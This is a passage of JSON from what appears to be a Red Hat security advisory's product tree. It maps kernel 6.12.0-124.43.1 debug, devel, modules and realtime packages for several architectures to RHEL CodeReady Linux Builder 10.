"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
